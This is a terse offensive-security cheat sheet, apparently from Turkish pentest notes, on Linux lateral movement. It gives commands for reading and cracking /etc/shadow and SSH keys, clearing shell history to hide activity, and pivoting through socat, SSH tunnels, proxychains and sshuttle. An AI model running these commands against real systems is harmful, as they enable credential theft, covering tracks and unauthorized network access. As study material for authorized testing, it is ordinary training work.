Linux Lateral Movement
Hash Dumping
cat /etc/shadow > shadow.txt
john --format=sha512crypt shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1800 shadow.txt /usr/share/wordlists/rockyou.txt
ssh2john id_rsa > ssh.hash
sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'History Silme
history -c
cat /dev/null > ~/.bash_historyPort Forwarding
# 8080 portunu dinler ve bütün trafiği 80 portuna yönlendirir
socat TCP4-LISTEN:8080,fork TCP4:192.168.1.4:80
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443SSH Tunneling
# Local port forwarding (Karşıdaki bir portu kendimize alma)
ssh -L 1234:localhost:3306 root@192.168.1.3
# Dynamic Port Forwarding (Karşıdaki bütün portları kendimize alma)
ssh -D 9999 root@192.168.1.3
mousepad /etc/proxychains4.conf
socks5 192.168.1.3 9999
proxychains nmap -sT -Pn 172.168.1.3
# Remote Port Forward (Kendi Portumuzu karşıya yönlendirme)
ssh -R 10.0.0.3:8080:0.0.0.0:80 ubuntu@192.168.1.3 -vN
# Remote Dynamic Port Forward
ssh -N -R 9999 root@192.168.1.2
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999
proxychains nmap -v -sT -Pn -n 172.168.1.3
# SShuttle
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24Chisel
Ligolo
DNS Tunneling
ICMP Tunneling
Last updated